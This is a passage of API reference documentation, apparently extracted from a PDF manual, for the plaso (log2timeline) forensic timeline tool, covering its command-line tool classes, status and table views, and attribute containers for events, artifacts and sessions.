The worker processes CLI arguments helper.

class plaso.cli.helpers.workers.WorkersArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

Worker processes CLI arguments helper.




DESCRIPTION = 'Worker processes command line arguments.'

NAME = 'workers'


Parameters



Raises





plaso.cli.helpers.xlsx_output module

The XLSX output module CLI arguments helper.

class plaso.cli.helpers.xlsx_output.XLSXOutputArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

XLSX output module CLI arguments helper.




CATEGORY = 'output'

DESCRIPTION = 'Argument helper for the XLSX output module.'

NAME = 'xlsx'


Parameters


• output_module (XLSXOutputModule) – output module to configure.

Raises


• BadConfigOption – when the output filename was not provided.

plaso.cli.helpers.yara_rules module

The YARA rules CLI arguments helper.

class plaso.cli.helpers.yara_rules.YaraRulesArgumentsHelperBases: plaso.cli.helpers.interface.ArgumentsHelper

YARA rules CLI arguments helper.




DESCRIPTION = 'YARA rules command line arguments.'

NAME = 'yara_rules'


Parameters

5.1. Subpackages 83





Module contents

This file imports Python modules that register CLI helpers.

Submodules

plaso.cli.extraction_tool module

The extraction CLI tool.

class plaso.cli.extraction_tool.ExtractionTool(input_reader=None, out-put_writer=None)

Bases: plaso.cli.storage_media_tool.StorageMediaTool, plaso.cli.tool_options.HashersOptions, plaso.cli.tool_options.ProfilingOptions, plaso.cli.tool_options.StorageFileOptions

Extraction CLI tool.

list_time_zonesTrue if the time zones should be listed.

Type bool

AddPerformanceOptions(argument_group)Adds the performance options to the argument group.

Parameters argument_group (argparse._ArgumentGroup) – argparse argumentgroup.

AddProcessingOptions(argument_group)Adds the processing options to the argument group.


AddTimeZoneOption(argument_group)Adds the time zone option to the argument group.


ListParsersAndPlugins()Lists information about the available parsers and plugins.



plaso.cli.image_export_tool module

The image export CLI tool.

class plaso.cli.image_export_tool.ImageExportTool(input_reader=None, out-put_writer=None)

Bases: plaso.cli.storage_media_tool.StorageMediaTool

Class that implements the image export CLI tool.

has_filtersTrue if filters have been specified via the options.

Type bool

list_signature_identifiersTrue if information about the signature identifiers should be shown.

Type bool

AddFilterOptions(argument_group)Adds the filter options to the argument group.


DESCRIPTION = 'This is a simple collector designed to export files inside an image, both within a regular RAW image as well as inside a VSS. The tool uses a collection filter that uses the same syntax as a targeted plaso filter.'

EPILOG = 'And that is how you export files, plaso style.'

ListSignatureIdentifiers()Lists the signature identifier.

Raises BadConfigOption – if the data location is invalid.

NAME = 'image_export'

ParseArguments(arguments)Parses the command line arguments.

Parameters arguments (list[str]) – command line arguments.

Returns True if the arguments were successfully parsed.

Return type bool

ParseOptions(options)Parses the options and initializes the front-end.

Parameters options (argparse.Namespace) – command line arguments.

Raises BadConfigOption – if the options are invalid.

PrintFilterCollection()Prints the filter collection.

ProcessSources()Processes the sources.

Raises

• SourceScannerError – if the source scanner could not find a supported file system.

• UserAbort – if the user initiated an abort.

5.1. Subpackages 85


plaso.cli.log2timeline_tool module

The log2timeline CLI tool.

class plaso.cli.log2timeline_tool.Log2TimelineTool(input_reader=None, out-put_writer=None)

Bases: plaso.cli.extraction_tool.ExtractionTool

Log2timeline CLI tool.

dependencies_checkTrue if the availability and versions of dependencies should be checked.

Type bool

list_hashersTrue if the hashers should be listed.

Type bool

list_parsers_and_pluginsTrue if the parsers and plugins should be listed.

Type bool

list_profilersTrue if the profilers should be listed.

Type bool

show_infoTrue if information about hashers, parsers, plugins, etc. should be shown.

Type bool

DESCRIPTION = '\nlog2timeline is a command line tool to extract events from individual \nfiles, recursing a directory (e.g. mount point) or storage media \nimage or device.\n\nMore information can be gathered from here:\n https://plaso.readthedocs.io/en/latest/sources/user/Using-log2timeline.html\n'

EPILOG = '\nExample usage:\n\nRun the tool against a storage media image (full kitchen sink)\n log2timeline.py /cases/mycase/storage.plaso ímynd.dd\n\nInstead of answering questions, indicate some of the options on the\ncommand line (including data from particular VSS stores).\n log2timeline.py --vss_stores 1,2 /cases/plaso_vss.plaso image.E01\n\nAnd that is how you build a timeline using log2timeline...\n'

ExtractEventsFromSources()Processes the sources and extracts events.

Raises

• BadConfigOption – if the storage file path is invalid or the storage format not sup-ported or an invalid collection filter was specified.



NAME = 'log2timeline'




Return type bool

ParseOptions(options)Parses the options.





ShowInfo()Shows information about available hashers, parsers, plugins, etc.

plaso.cli.logger module

The cli sub module logger.

plaso.cli.pinfo_tool module

The pinfo CLI tool.

class plaso.cli.pinfo_tool.PinfoTool(input_reader=None, output_writer=None)Bases: plaso.cli.tools.CLITool, plaso.cli.tool_options.StorageFileOptions

Pinfo CLI tool.

compare_storage_informationTrue if the tool is used to compare stores.

Type bool

list_sectionsTrue if the sections should be listed.

Type bool

CompareStores()Compares the contents of two stores.

Returns True if the content of the stores is identical.

Return type bool

DESCRIPTION = 'Shows information about a Plaso storage file, for example how it was collected, what information was extracted from a source, etc.'

ListSections()Lists information about the available sections.

NAME = 'pinfo'




Return type bool




PrintStorageInformation()Prints the storage information.

5.1. Subpackages 87


plaso.cli.psort_tool module

The psort CLI tool.

class plaso.cli.psort_tool.PsortTool(input_reader=None, output_writer=None)Bases: plaso.cli.tools.CLITool, plaso.cli.tool_options.AnalysisPluginOptions,plaso.cli.tool_options.FormattersOptions, plaso.cli.tool_options.OutputModuleOptions, plaso.cli.tool_options.ProfilingOptions, plaso.cli.tool_options.StorageFileOptions

Psort CLI tool.

list_analysis_pluginsTrue if information about the analysis plugins should be shown.

Type bool

list_language_identifiersTrue if information about the language identifiers should be shown.

Type bool

list_output_modulesTrue if information about the output modules should be shown.

Type bool

list_profilersTrue if the profilers should be listed.

Type bool

list_time_zonesTrue if the time zones should be listed.

Type bool

AddOutputTimeZoneOption(argument_group)Adds the output time zone option to the argument group.


AddProcessingOptions(argument_group)Adds processing options to the argument group


DESCRIPTION = 'Application to read, filter and process output from a plaso storage file.'

NAME = 'psort'




Return type bool






ProcessStorage()Processes a plaso storage file.

Raises

• BadConfigOption – when a configuration parameter fails validation or the storage filecannot be opened with read access.

• RuntimeError – if a non-recoverable situation is encountered.

plaso.cli.psteal_tool module

The psteal CLI tool.

class plaso.cli.psteal_tool.PstealTool(input_reader=None, output_writer=None)Bases: plaso.cli.extraction_tool.ExtractionTool, plaso.cli.tool_options.FormattersOptions, plaso.cli.tool_options.HashersOptions, plaso.cli.tool_options.OutputModuleOptions, plaso.cli.tool_options.StorageFileOptions

Psteal CLI tool.

Psteal extract events from the provided source and stores them in an intermediate storage file. After extractionan output log file is created. This mimics the behavior of the log2timeline.pl.

The tool currently doesn’t support any of the log2timeline or psort tools’ flags.

dependencies_checkTrue if the availability and versions of dependencies should be checked.

Type bool

list_hashersTrue if the hashers should be listed.

Type bool

list_language_identifiersTrue if information about the language identifiers should be shown.

Type bool

list_output_modulesTrue if information about the output modules should be shown.

Type bool

list_parsers_and_pluginsTrue if the parsers and plugins should be listed.

Type bool

AddOutputTimeZoneOption(argument_group)Adds the output time zone option to the argument group.


AnalyzeEvents()Analyzes events from a plaso storage file and generate a report.

Raises

5.1. Subpackages 89


• BadConfigOption – when a configuration parameter fails validation or the storage filecannot be opened with read access.

• RuntimeError – if a non-recoverable situation is encountered.

DESCRIPTION = '\npsteal is a command line tool to extract events from individual \nfiles, recursing a directory (e.g. mount point) or storage media \nimage or device. The output events will be stored in a storage file.\nThis tool will then read the output and process the events into a CSV \nfile.\n\nMore information can be gathered from here:\n https://plaso.readthedocs.io/en/latest/sources/user/Using-log2timeline.html\n'

EPILOG = '\nExample usage:\n\nRun the tool against a storage media image (full kitchen sink)\n psteal.py --source ímynd.dd -w imynd.timeline.txt\n\nAnd that is how you build a timeline using psteal...\n'

ExtractEventsFromSources()Processes the sources and extract events.

This is a stripped down copy of tools/log2timeline.py that doesn’t support the full set of flags. The defaultsfor these are hard coded in the constructor of this class.

Raises

• BadConfigOption – if the storage file path is invalid or the storage format not sup-ported or an invalid collection filter was specified.



NAME = 'psteal'




Return type bool

ParseOptions(options)Parses tool specific options.



plaso.cli.status_view module

The status view.

class plaso.cli.status_view.StatusView(output_writer, tool_name)Bases: object

Processing status view.

GetAnalysisStatusUpdateCallback()Retrieves the analysis status update callback function.

Returns status update callback function or None if not available.

Return type function

GetExtractionStatusUpdateCallback()Retrieves the extraction status update callback function.

Returns status update callback function or None if not available.

Return type function

MODE_LINEAR = 'linear'



MODE_WINDOW = 'window'

PrintExtractionStatusHeader(processing_status)Prints the extraction status header.

Parameters processing_status (ProcessingStatus) – processing status.

PrintExtractionSummary(processing_status)Prints a summary of the extraction.

Parameters processing_status (ProcessingStatus) – processing status.

SetMode(mode)Sets the mode.

Parameters mode (str) – status view mode.

SetSourceInformation(source_path, source_type, artifact_filters=None, filter_file=None)Sets the source information.

Parameters

• source_path (str) – path of the source.

• source_type (str) – source type.

• artifact_filters (Optional[list[str]]) – names of artifact definitions touse as filters.

• filter_file (Optional[str]) – filter file.

SetStorageFileInformation(storage_file_path)Sets the storage file information.

Parameters storage_file_path (str) – path to the storage file.

plaso.cli.storage_media_tool module

The storage media CLI tool.

class plaso.cli.storage_media_tool.StorageMediaTool(input_reader=None, out-put_writer=None)

Bases: plaso.cli.tools.CLITool

CLI tool that supports a storage media device or image as input.

AddCredentialOptions(argument_group)Adds the credential options to the argument group.

The credential options are use to unlock encrypted volumes.


AddStorageMediaImageOptions(argument_group)Adds the storage media image options to the argument group.


AddVSSProcessingOptions(argument_group)Adds the VSS processing options to the argument group.


5.1. Subpackages 91


ScanSource(source_path)Scans the source path for volume and file systems.

This function sets the internal source path specification and source type values.

Parameters source_path (str) – path to the source.

Returns source scanner context.

Return type dfvfs.SourceScannerContext

Raises SourceScannerError – if the format of or within the source is not supported.

plaso.cli.time_slices module

The time slice.

class plaso.cli.time_slices.TimeSlice(event_timestamp, duration=5)Bases: object

Time slice.

The time slice is used to provide a context of events around an event of interest.

durationduration of the time slice in minutes.

Type int

event_timestampevent timestamp of the time slice or None.

Type int

property end_timestampslice end timestamp or None.

Type int

property start_timestampslice start timestamp or None.

Type int

plaso.cli.tool_options module

The CLI tool options mix-ins.

class plaso.cli.tool_options.AnalysisPluginOptionsBases: object

Analysis plugin options mix-in.

ListAnalysisPlugins()Lists the analysis modules.

class plaso.cli.tool_options.FormattersOptionsBases: object

Formatters options mix-in.



class plaso.cli.tool_options.HashersOptionsBases: object

Hashers options mix-in.

ListHashers()Lists information about the available hashers.

class plaso.cli.tool_options.OutputModuleOptionsBases: object

Output module options mix-in.

ListLanguageIdentifiers()Lists the language identifiers.

ListOutputModules()Lists the output modules.

class plaso.cli.tool_options.ProfilingOptionsBases: object

Profiling options mix-in.

ListProfilers()Lists information about the available profilers.

class plaso.cli.tool_options.StorageFileOptionsBases: object

Storage file options mix-in.

plaso.cli.tools module

The command line interface (CLI) tools classes.

class plaso.cli.tools.CLIInputReader(encoding='utf-8')Bases: object

Command line interface input reader interface.

abstract Read()Reads a string from the input.

Returns input.

Return type str

class plaso.cli.tools.CLIOutputWriter(encoding='utf-8')Bases: object

Command line interface output writer interface.

abstract Write(string)Writes a string to the output.

Parameters string (str) – output.

class plaso.cli.tools.CLITool(input_reader=None, output_writer=None)Bases: object

Command line interface tool.

preferred_encodingpreferred encoding of single-byte or multi-byte character strings, sometimes referred to as extended ASCII.

5.1. Subpackages 93


Type str

show_troubleshootingTrue if troubleshooting information should be shown.

Type bool

AddBasicOptions(argument_group)Adds the basic options to the argument group.


AddInformationalOptions(argument_group)Adds the informational options to the argument group.


AddLogFileOptions(argument_group)Adds the log file option to the argument group.


CheckOutDated()Checks if the version of plaso is outdated and warns the user.

GetCommandLineArguments()Retrieves the command line arguments.

Returns command line arguments.

Return type str

GetVersionInformation()Retrieves the version information.

Returns version information.

Return type str

ListTimeZones()Lists the timezones.

NAME = ''

ParseNumericOption(options, name, base=10, default_value=None)Parses a numeric option.

If the option is not set the default value is returned.

Parameters

• options (argparse.Namespace) – command line arguments.

• name (str) – name of the numeric option.

• base (Optional[int]) – base of the numeric value.

• default_value (Optional[object]) – default value.

Returns numeric value.

Return type int




ParseStringOption(options, argument_name, default_value=None)Parses a string command line argument.

Parameters

• options (argparse.Namespace) – command line arguments.

• argument_name (str) – name of the command line argument.

• default_value (Optional[object]) – default value of the command line argu-ment.

Returns

command line argument value. If the command line argument is not set the defaultvalue will be returned.

Return type object

Raises BadConfigOption – if the command line argument value cannot be converted to aUnicode string.

PrintSeparatorLine()Prints a separator line.

class plaso.cli.tools.FileObjectInputReader(file_object, encoding='utf-8')Bases: plaso.cli.tools.CLIInputReader

File object command line interface input reader.

This input reader relies on the file-like object having a readline method.

Read()Reads a string from the input.

Returns input.

Return type str

class plaso.cli.tools.FileObjectOutputWriter(file_object, encoding='utf-8')Bases: plaso.cli.tools.CLIOutputWriter

File object command line interface output writer.

This output writer relies on the file-like object having a write method.

Write(string)Writes a string to the output.


class plaso.cli.tools.StdinInputReader(encoding='utf-8')Bases: plaso.cli.tools.FileObjectInputReader

Stdin command line interface input reader.

Read()Reads a string from the input.

Returns input.

Return type str

class plaso.cli.tools.StdoutOutputWriter(encoding='utf-8')Bases: plaso.cli.tools.FileObjectOutputWriter

Stdout command line interface output writer.

5.1. Subpackages 95


Write(string)Writes a string to the output.


plaso.cli.views module

View classes.

class plaso.cli.views.BaseTableView(column_names=None, title=None)Bases: object

Table view interface.

AddRow(values)Adds a row of values.

Parameters values (list[object]) – values.

Raises ValueError – if the number of values is out of bounds.

abstract Write(output_writer)Writes the table to the output writer.

Parameters output_writer (OutputWriter) – output writer.

class plaso.cli.views.CLITableView(column_names=None, title=None)Bases: plaso.cli.views.BaseTableView

Command line table view.

Note that currently this table view does not support more than 2 columns.




Write(output_writer)Writes the table to the output writer.


Raises RuntimeError – if the title exceeds the maximum width or if the table has more than2 columns or if the column width is out of bounds.

class plaso.cli.views.CLITabularTableView(column_names=None, column_sizes=None, ti-tle=None)

Bases: plaso.cli.views.BaseTableView

Command line tabular table view interface.








class plaso.cli.views.MarkdownTableView(column_names=None, title=None)Bases: plaso.cli.views.BaseTableView

Markdown table view.



class plaso.cli.views.ViewsFactoryBases: object

Views factory.

FORMAT_TYPE_CLI = 'cli'

FORMAT_TYPE_MARKDOWN = 'markdown'

classmethod GetTableView(format_type, column_names=None, title=None)Retrieves a table view.

Parameters

• format_type (str) – table view format type.

• column_names (Optional[list[str]]) – column names.

• title (Optional[str]) – title.

Returns table view.

Return type BaseTableView

Raises ValueError – if the format type is not supported.

Module contents

5.1.4 plaso.containers package

Submodules

plaso.containers.analyzer_result module

Analyzer result attribute container.

class plaso.containers.analyzer_result.AnalyzerResultBases: plaso.containers.interface.AttributeContainer

Attribute container to store results of analyzers.

Analyzers can produce results with different attribute names. For example, the ‘hashing’ analyzer could producean attribute ‘md5_hash’, with a value of ‘d41d8cd98f00b204e9800998ecf8427e’.

analyzer_namename of the analyzer that produce the result.

Type str

attribute_namename of the attribute produced.

Type str

5.1. Subpackages 97


attribute_valuevalue of the attribute produced.

Type str

CONTAINER_TYPE = 'analyzer_result'

plaso.containers.artifacts module

Artifact attribute containers.

class plaso.containers.artifacts.ArtifactAttributeContainerBases: plaso.containers.interface.AttributeContainer

Base class to represent an artifact attribute container.

class plaso.containers.artifacts.EnvironmentVariableArtifact(case_sensitive=True,name=None,value=None)

Bases: plaso.containers.artifacts.ArtifactAttributeContainer

Environment variable artifact attribute container.

Also see: https://en.wikipedia.org/wiki/Environment_variable

case_sensitiveTrue if environment variable name is case sensitive.

Type bool

nameenvironment variable name such as “SystemRoot” as in “%SystemRoot%” or “HOME” as in “$HOME”.

Type str

valueenvironment variable value such as “C:Windows” or “/home/user”.

Type str

CONTAINER_TYPE = 'environment_variable'

class plaso.containers.artifacts.HostnameArtifact(name=None, schema='DNS')Bases: plaso.containers.artifacts.ArtifactAttributeContainer

Hostname artifact attribute container.

Also see: https://en.wikipedia.org/wiki/Hostname Cybox / Stix Hostname Object

namename of the host according to the naming schema.

Type str

schemanaming schema such as “DNS”, “NIS”, “SMB/NetBIOS”.

Type str

CONTAINER_TYPE = 'hostname'

class plaso.containers.artifacts.OperatingSystemArtifact(family=None, prod-uct=None, ver-sion=None)



https://en.wikipedia.org/wiki/Environment_variable

https://en.wikipedia.org/wiki/Hostname


Operating system artifact attribute container.

familyoperating system family name, such as “Linux”, “MacOS” or “Windows”, defined in defini-tions.OPERATING_SYSTEM_FAMILIES. This value is used to programmatically link a parser presetto an operating system and therefore must be one of predefined values.

Type str

nameoperating system name, such as “macOS Mojave” or “Windows XP”. This value is used to programmati-cally link a parser preset to an operating system and therefore must be one of predefined values.

Type str

productproduct information, such as “macOS Mojave” or “Windows Professional XP”. This value is typicallyobtained from the source data.

Type str

versionversion, such as “10.14.1” or “5.1”. This value is typically obtained from the source data.

Type str

CONTAINER_TYPE = 'operating_system'

IsEquivalent(other)Determines if 2 operating system artifacts are equivalent.

This function compares the operating systems based in order of: * name derived from product * familyand version * family

Parameters other (OperatingSystemArtifact) – operating system artifact attributecontainer to compare with.

Returns

True if the operating systems are considered equivalent, False if the most specific crite-ria do no match, or no criteria are available.

Return type bool

property version_tupleversion tuple or None if version is not set or invalid.

Type tuple[int]

class plaso.containers.artifacts.SourceConfigurationArtifact(path_spec=None)Bases: plaso.containers.artifacts.ArtifactAttributeContainer

Source configuration artifact attribute container.

The source configuration contains the configuration data of a source that is (or going to be) processed such asvolume in a storage media image or a mounted directory.

mount_pathpath of a “mounted” directory input source.

Type str

path_specpath specification of the source that is processed.

Type dfvfs.PathSpec

5.1. Subpackages 99


system_configurationsystem configuration of a specific system installation, such as Windows or Linux, detected by the pre-processing on the source.

Type SystemConfigurationArtifact

CONTAINER_TYPE = 'source_configuration'

class plaso.containers.artifacts.SystemConfigurationArtifact(code_page=None,time_zone=None)


System configuration artifact attribute container.

The system configuration contains the configuration data of a specific system installation such as Windows orLinux.

available_time_zonesavailable time zones.

Type list[TimeZone]

code_pagesystem code page.

Type str

hostnamehostname.

Type HostnameArtifact

keyboard_layoutkeyboard layout.

Type str

operating_systemoperating system for example “MacOS” or “Windows”.

Type str

operating_system_productoperating system product for example “Windows XP”.

Type str

operating_system_versionoperating system version for example “10.9.2” or “8.1”.

Type str

time_zonesystem time zone.

Type str

user_accountsuser accounts.

Type list[UserAccountArtifact]

CONTAINER_TYPE = 'system_configuration'

class plaso.containers.artifacts.TimeZoneArtifact(name=None)Bases: plaso.containers.artifacts.ArtifactAttributeContainer



Time zone artifact attribute container.

namename describing the time zone for example Greenwich Standard Time.

Type str

CONTAINER_TYPE = 'time_zone'

class plaso.containers.artifacts.UserAccountArtifact(full_name=None,group_identifier=None, identi-fier=None, path_separator='/',user_directory=None, user-name=None)


User account artifact attribute container.

Also see: Cybox / Stix User Account Object

full_namename describing the user.

Type str

group_identifieridentifier of the primary group the user is part of.

Type str

identifieruser identifier.

Type str

user_directorypath of the user (or home or profile) directory.

Type str

usernamename uniquely identifying the user.

Type str

CONTAINER_TYPE = 'user_account'

GetUserDirectoryPathSegments()Retrieves the path segments of the user directory.

Returns

path segments of the user directory or an empty list if no user directory is set.


5.1. Subpackages 101


plaso.containers.event_sources module

Event source attribute containers.

class plaso.containers.event_sources.EventSource(path_spec=None)Bases: plaso.containers.interface.AttributeContainer

Event source attribute container.

The event source object contains information about where a specific event originates e.g. a file, the $STAN-DARD_INFORMATION MFT attribute, or Application Compatibility cache.

data_typeattribute container type indicator.

Type str

file_entry_typedfVFS file entry type.

Type str

path_specpath specification.

Type dfvfs.PathSpec

CONTAINER_TYPE = 'event_source'

DATA_TYPE = None

__lt__(other)Compares if the event source attribute container is less than the other.

Parameters other (EventSource) – event source attribute container to compare to.

Returns True if the event source attribute container is less than the other.

Return type bool

class plaso.containers.event_sources.FileEntryEventSource(path_spec=None)Bases: plaso.containers.event_sources.EventSource

File entry event source.

The file entry event source is an event source that represents a file within a file system.

DATA_TYPE = 'file_entry'

plaso.containers.events module

Event attribute containers.

class plaso.containers.events.EventData(data_type=None)Bases: plaso.containers.interface.AttributeContainer

Event data attribute container.

The event data attribute container represents the attributes of an entity, such as a database record or log line.

data_typeevent data type indicator.

Type str



offsetoffset relative to the start of the data stream where the event data is stored.

Type int

parserstring identifying the parser that produced the event data.

Type str

queryquery that was used to obtain the event data.

Type str

CONTAINER_TYPE = 'event_data'

GetAttributeValuesString()Retrieves a comparable string of the attribute values.

Returns comparable string of the attribute values.

Return type str

Raises TypeError – if the attribute value type is not supported.

GetEventDataStreamIdentifier()Retrieves the identifier of the associated event data stream.

The event data stream identifier is a storage specific value that should not be serialized.

Returns event data stream or None when not set.

Return type AttributeContainerIdentifier

SetEventDataStreamIdentifier(event_data_stream_identifier)Sets the identifier of the associated event data stream.

The event data stream identifier is a storage specific value that should not be serialized.

Parameters event_data_stream_identifier (AttributeContainerIdentifier)– event data stream identifier.

class plaso.containers.events.EventDataStreamBases: plaso.containers.interface.AttributeContainer

Event data stream attribute container.

The event data stream attribute container represents the attributes of a data stream, such as the content of a fileor extended attribute.

file_entropybyte entropy value of the data stream.

Type str

md5_hashMD5 digest hash of the data stream.

Type str

path_specpath specification of the data stream.

Type dfvfs.PathSpec



sha1_hashSHA-1 digest hash of the data stream.

Type str

sha256_hashSHA-256 digest hash of the data stream.

Type str

yara_matchnames of the Yara rules that matched the data stream.

Type list[str]

CONTAINER_TYPE = 'event_data_stream'

class plaso.containers.events.EventObjectBases: plaso.containers.interface.AttributeContainer

Event attribute container.

The framework is designed to parse files and create events from individual records, log lines or keys extractedfrom files. The event object provides an extensible data store for event attributes.

date_timedate and time values.

Type dfdatetime.DateTimeValues

parserstring identifying the parser that produced the event.

Type str

timestamptimestamp, which contains the number of microseconds since January 1, 1970, 00:00:00 UTC.

Type int

timestamp_descdescription of the meaning of the timestamp.

Type str

CONTAINER_TYPE = 'event'

GetEventDataIdentifier()Retrieves the identifier of the associated event data.

The event data identifier is a storage specific value that should not be serialized.

Returns event data identifier or None when not set.


SetEventDataIdentifier(event_data_identifier)Sets the identifier of the associated event data.

The event data identifier is a storage specific value that should not be serialized.

Parameters event_data_identifier (AttributeContainerIdentifier) –event data identifier.

__lt__(other)Compares if the event attribute container is less than the other.



Events are compared by timestamp.

Parameters other (EventObject) – event attribute container to compare to.

Returns True if the event attribute container is less than the other.

Return type bool

class plaso.containers.events.EventTagBases: plaso.containers.interface.AttributeContainer

Event tag attribute container.

labelslabels, such as “malware”, “application_execution”.

Type list[str]

AddLabel(label)Adds a label to the event tag.

Parameters label (str) – label.

Raises

• TypeError – if the label provided is not a string.

• ValueError – if a label is malformed.

AddLabels(labels)Adds labels to the event tag.

Parameters labels (list[str]) – labels.

Raises ValueError – if a label is malformed.

CONTAINER_TYPE = 'event_tag'

classmethod CopyTextToLabel(text, prefix='')Copies a string to a label.

A label only supports a limited set of characters therefore unsupported characters are replaced with anunderscore.

Parameters

• text (str) – label text.

• prefix (Optional[str]) – label prefix.

Returns label.

Return type str

CopyToDict()Copies the event tag to a dictionary.

Returns event tag attributes.


GetEventIdentifier()Retrieves the identifier of the associated event.

The event identifier is a storage specific value that should not be serialized.

Returns event identifier or None when not set.




SetEventIdentifier(event_identifier)Sets the identifier of the associated event.

The event identifier is a storage specific value that should not be serialized.

Parameters event_identifier (AttributeContainerIdentifier) – event iden-tifier.

plaso.containers.interface module

The attribute container interface.

class plaso.containers.interface.AttributeContainerBases: object

The attribute container interface.

This is the the base class for those object that exists primarily as a container of attributes with basic accessorsand mutators.

The CONTAINER_TYPE class attribute contains a string that identifies the container type, for example thecontainer type “event” identifiers an event object.

Attributes are public class members of an serializable type. Protected and private class members are not to beserialized, with the exception of those defined in _SERIALIZABLE_PROTECTED_ATTRIBUTES.

CONTAINER_TYPE = None

CopyFromDict(attributes)Copies the attribute container from a dictionary.

Parameters attributes (dict[str, object]) – attribute values per name.

CopyToDict()Copies the attribute container to a dictionary.

Returns attribute values per name.


GetAttributeNames()Retrieves the names of all attributes.

Returns attribute names.


GetAttributeValuesHash()Retrieves a comparable string of the attribute values.

Returns hash of comparable string of the attribute values.

Return type int

GetAttributeValuesString()Retrieves a comparable string of the attribute values.

Returns comparable string of the attribute values.

Return type str

GetAttributes()Retrieves the attribute names and values.

Attributes that are set to None are ignored.



Yields tuple[str, object] – attribute name and value.

GetIdentifier()Retrieves the identifier.

The identifier is a storage specific value that should not be serialized.

Returns an unique identifier for the container.


GetSessionIdentifier()Retrieves the session identifier.

The session identifier is a storage specific value that should not be serialized.

Returns session identifier.

Return type str

SetIdentifier(identifier)Sets the identifier.

The identifier is a storage specific value that should not be serialized.

Parameters identifier (AttributeContainerIdentifier) – identifier.

SetSessionIdentifier(session_identifier)Sets the session identifier.

The session identifier is a storage specific value that should not be serialized.

Parameters session_identifier (str) – session identifier.

class plaso.containers.interface.AttributeContainerIdentifierBases: object

The attribute container identifier.

The identifier is used to uniquely identify attribute containers. The value should be unique at runtime and instorage.

CopyToString()Copies the identifier to a string representation.

Returns unique identifier or None.

Return type str

plaso.containers.manager module

This file contains the attribute container manager class.

class plaso.containers.manager.AttributeContainersManagerBases: object

Class that implements the attribute container manager.

classmethod CreateAttributeContainer(container_type)Creates an instance of a specific attribute container type.

Parameters container_type (str) – container type.

Returns an instance of attribute container.

Return type AttributeContainer



Raises ValueError – if the container type is not supported.

classmethod DeregisterAttributeContainer(attribute_container_class)Deregisters an attribute container class.

The attribute container classes are identified based on their lower case container type.

Parameters attribute_container_class (type) – attribute container class.

Raises KeyError – if attribute container class is not set for the corresponding container type.

classmethod RegisterAttributeContainer(attribute_container_class)Registers a attribute container class.


Parameters attribute_container_class (type) – attribute container class.

Raises KeyError – if attribute container class is already set for the corresponding containertype.

classmethod RegisterAttributeContainers(attribute_container_classes)Registers attribute container classes.


Parameters attribute_container_classes (list[type]) – attribute containerclasses.

Raises KeyError – if attribute container class is already set for the corresponding containertype.

plaso.containers.plist_event module

Plist event attribute containers.

class plaso.containers.plist_event.PlistTimeEventDataBases: plaso.containers.events.EventData

Plist event data attribute container.

descdescription.

Type str

hostnamehostname.

Type str

keyname of plist key.

Type str

rootpath from the root to this plist key.

Type str

usernameunique username.

Type str



DATA_TYPE = 'plist:key'

plaso.containers.reports module

Report related attribute container definitions.

class plaso.containers.reports.AnalysisReport(plugin_name=None, text=None)Bases: plaso.containers.interface.AttributeContainer

Analysis report attribute container.

filter_stringevent filter expression.

Type str

plugin_namename of the analysis plugin that generated the report.

Type str

report_array???

Type array[str]

report_dict???

Type dict[str]

textreport text.

Type str

time_compiledtimestamp of the date and time the report was compiled.

Type int

CONTAINER_TYPE = 'analysis_report'

CopyToDict()Copies the attribute container to a dictionary.

Returns attribute values per name.


GetString()Retrieves a string representation of the report.

Returns string representation of the report.

Return type str



plaso.containers.sessions module

Session related attribute container definitions.

class plaso.containers.sessions.SessionBases: plaso.containers.interface.AttributeContainer

Session attribute container.

abortedTrue if the session was aborted.

Type bool

analysis_reports_counternumber of analysis reports per analysis plugin.

Type collections.Counter

artifact_filtersNames of artifact definitions that are used for filtering file system and Windows Registry key paths.

Type list[str]

command_line_argumentscommand line arguments.

Type str

completion_timetime that the session was completed. Contains the number of micro seconds since January 1, 1970,00:00:00 UTC.

Type int

debug_modeTrue if debug mode was enabled.

Type bool

enabled_parser_namesparser and parser plugin names that were enabled.

Type list[str]

event_labels_counternumber of event tags per label.


filter_filepath to a file with find specifications.

Type str

identifierunique identifier of the session.

Type str

parser_filter_expressionparser filter expression.

Type str



parsers_counternumber of events per parser or parser plugin.


preferred_encodingpreferred encoding.

Type str

preferred_time_zonepreferred time zone.

Type str

preferred_yearpreferred year.

Type int

product_namename of the product that created the session for example “log2timeline”.

Type str

product_versionversion of the product that created the session.

Type str

source_configurationsconfiguration of sources that are (or going to be) processed.

Type list[SourceConfiguration]

start_timetime that the session was started. Contains the number of micro seconds since January 1, 1970, 00:00:00UTC.

Type int

text_prependtext to prepend to every display name.

Type str

CONTAINER_TYPE = 'session'

CopyAttributesFromSessionCompletion(session_completion)Copies attributes from a session completion.

Parameters session_completion (SessionCompletion) – session completion at-tribute container.

Raises ValueError – if the identifier of the session completion does not match that of thesession.

CopyAttributesFromSessionConfiguration(session_configuration)Copies attributes from a session configuration.

Parameters session_configuration (SessionConfiguration) – session configu-ration attribute container.

Raises ValueError – if the identifier of the session configuration does not match that of thesession.



CopyAttributesFromSessionStart(session_start)Copies attributes from a session start.

Parameters session_start (SessionStart) – session start attribute container.

CreateSessionCompletion()Creates a session completion.

Returns session completion attribute container.

Return type SessionCompletion

CreateSessionConfiguration()Creates a session configuration.

Returns session configuration attribute container.

Return type SessionConfiguration

CreateSessionStart()Creates a session start.

Returns session start attribute container.

Return type SessionStart

class plaso.containers.sessions.SessionCompletion(identifier=None)Bases: plaso.containers.interface.AttributeContainer

Session completion attribute container.


Type bool

analysis_reports_counternumber of analysis reports per analysis plugin.


event_labels_counternumber of event tags per label.



Type str

parsers_counternumber of events per parser or parser plugin.


timestamptime that the session was completed. Contains the number of micro seconds since January 1, 1970,00:00:00 UTC.

Type int

CONTAINER_TYPE = 'session_completion'

class plaso.containers.sessions.SessionConfiguration(identifier=None)Bases: plaso.containers.interface.AttributeContainer



Session configuration attribute container.

The session configuration contains various settings used within a session, such as parser and collection filtersthat are used, and information about the source being processed, such as the system configuration determinedby pre-processing.

artifact_filtersnames of artifact definitions that are used for filtering file system and Windows Registry key paths.

Type list[str]


Type str

debug_modeTrue if debug mode was enabled.

Type bool

enabled_parser_namesparser and parser plugin names that were enabled.

Type list[str]


Type str


Type str

parser_filter_expressionparser filter expression.

Type str

preferred_encodingpreferred encoding.

Type str

preferred_time_zonepreferred time zone.

Type str

preferred_yearpreferred year.

Type int

source_configurationsconfiguration of sources that are (or going to be) processed.

Type list[SourceConfiguration]

text_prependtext to prepend to every display name.

Type str

